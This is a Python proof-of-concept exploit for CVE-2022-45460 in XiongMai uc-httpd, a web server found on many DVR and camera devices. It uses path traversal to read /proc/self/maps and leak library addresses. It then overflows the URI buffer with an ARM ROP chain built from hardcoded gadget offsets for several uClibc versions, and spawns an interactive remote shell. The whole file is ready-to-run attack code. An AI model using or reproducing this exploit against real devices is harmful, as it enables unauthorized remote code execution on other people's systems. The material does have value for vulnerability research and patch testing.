# Exploit Proof of Concept (PoC)
#
# Author: born0monday
# Target: XiongMai uc-httpd
# CVE: CVE-2022-45460 
# Description:  
# This script exploits a stack-based buffer overflow in the URI parsing of uc-http.
# A crafted request overwrites the return address, triggering a ROP chain to achieve RCE.
# 
# Disclaimer:  
# This code is for educational and research purposes only.  
# Use it responsibly and only on systems you have explicit permission to test.

import sys
import socket
import select
import struct

HOST, PORT = sys.argv[1], int(sys.argv[2])

GADGETS = {
    "libc.so.0": {
        0: 0xF964,  # mov r0, r3; pop {r4, pc}
        1: 0x1CDCC, # mov r1, #1; mov r2, r6; blx r5
        2: 0x175CC, # pop {r3, pc}
        3: 0x368DC, # mov r0, sp; blx r3
    },
    "libuClibc-0.9.32.1.so": {
        0: 0xF964,  # mov r0, r3; pop {r4, pc}
        1: 0x1CDCC, # mov r1, #1; mov r2, r6; blx r5
        2: 0x175CC, # pop {r3, pc}
        3: 0x368DC, # mov r0, sp; blx r3
    },
    "libuClibc-0.9.33.3-git.so": {
        0: 0xF3C4,  # mov r0, r3; pop {r4, pc}
        1: 0x22D74, # mov r1, #1; mov r2, r6; blx r5
        2: 0xCA60,  # pop {r3, pc}
        3: 0x151AC, # mov r0, sp; blx r3
    },
}

SYMBOLS = {
    "libc.so.0": {
        "fileno": 0x31030, # fileno + 0x4
        "dup2":   0xCE60,  # dup2 + 0x4
        "system": 0x535E8, # system
    },
    "libuClibc-0.9.32.1.so": {
        "fileno": 0x31030, # fileno + 0x4
        "dup2":   0xCE60,  # dup2 + 0x4
        "system": 0x535E8, # system
    },
    "libuClibc-0.9.33.3-git.so": {
        "fileno": 0x32AA0, # fileno + 0x4
        "dup2":   0xC720,  # dup2 + 0x4
        "system": 0x547C4, # system
    },
}

PADDING = b"XXXX"


def p32(addr):
    return struct.pack("<I", addr)


def parse_maps(maps):
    for line in maps.split(b"\n"):
        lib = line.split(b"/")[-1].decode()
        if lib in GADGETS.keys() and b"r-xp" in line:
            addr = int(line.split(b"-")[0].decode(), 16)
            print(f"{lib} found at {hex(addr)}")
            return lib, addr
    return None, None


def fetch_maps():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        print(f"connecting to {HOST}:{PORT}")
        sock.connect((HOST, PORT))

        sock.send(b"GET /../../../../../proc/self/maps HTTP/1.1\r\n")
        sock.send(b"\r\n\r\n")

        resp = b""
        while True:
            data = sock.recv(2048)
            if not data:
                break
            resp += data
        return resp


def interactive(sock):
    print("switching to interactive mode.")
    try:
        while True:
            read_list = [sys.stdin, sock]
            readable, _, _ = select.select(read_list, [], [])
            
            for r in readable:
                if r is sock:
                    data = sock.recv(4096)
                    if not data:
                        print("\nconnection closed by the remote side.")
                        return
                    sys.stdout.write(data.decode())
                    sys.stdout.flush()
                elif r is sys.stdin:
                    user_input = sys.stdin.readline()
                    sock.send(user_input.encode())
    except KeyboardInterrupt:
        print("\nexiting interactive mode.")


def main():
    maps = fetch_maps()
    libc, libc_base = parse_maps(maps)

    # fd = fileno(FILE *stream)
    # dup2(fd, 0) 
    # dup2(fd, 1) 
    # system("/bin/sh")

    payload = b""
    payload += 304 * b"A"
    payload += p32(libc_base + GADGETS[libc][0]) # mov r0, r3; pop {r4, pc}
    payload += PADDING # r4
    payload += p32(libc_base + SYMBOLS[libc]["fileno"])
    # fileno epilogue: ldmia sp!,{r4,r5,r6,r7,r8,pc}
    payload += PADDING # r4
    payload += p32(libc_base + SYMBOLS[libc]["dup2"]) # r5
    payload += PADDING # r6
    payload += PADDING # r7
    payload += PADDING # r8
    payload += p32(libc_base + SYMBOLS[libc]["dup2"]) # dup2, r1 = 0 -> STDIN
    # dup2 epilogue: ldmia sp!,{r7,pc}
    payload += PADDING # r7
    
    # dup2 r1 = 1 -> STDOUT
    payload += p32(libc_base + GADGETS[libc][1]) # mov r1, #1; mov r2, r6; blx r5
    # dup2 epilogue: ldmia sp!,{r7,pc}
    payload += PADDING # r7
    
    # shell
    payload += p32(libc_base + GADGETS[libc][2]) # pop {r3, pc};
    payload += p32(libc_base + SYMBOLS[libc]["system"]) # r3
    payload += p32(libc_base + GADGETS[libc][3]) # mov r0, sp; blx r3

    if b"\x00" in payload:
        print("null bytes in payload :/")
        sys.exit(1)

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((HOST, PORT))
        sock.send(b"GET /" + payload + b"/bin/sh;.mns.cab HTTP/1.1")
        sock.send(b"\r\n\r\n")
    
        interactive(sock)


if __name__ == "__main__":
    main()